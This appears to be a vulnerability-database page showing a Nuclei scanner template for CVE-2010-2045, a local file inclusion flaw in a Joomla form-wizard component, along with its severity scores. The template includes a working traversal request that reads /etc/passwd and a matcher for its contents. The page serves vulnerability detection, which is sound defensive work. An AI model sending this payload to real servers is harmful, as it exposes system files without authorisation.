Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2045
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
7

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.7 Medium

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.7%

A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.

id: CVE-2010-2045

info:
  name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12595
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2045
    - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2045
    cwe-id: CWE-22
    epss-score: 0.01671
    epss-percentile: 0.86287
    cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dionesoft
    product: com_dioneformwizard
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ca00fa1c2e8785e665cbf491b2e108f921561c2dd2e87039ef156d77c44f40e5022100daf8e4b14c228b30e2c641a0c6af878823e71701c4282339b11d1f50b27f3795:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.7 Medium

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.7%

Related for NUCLEI:CVE-2010-2045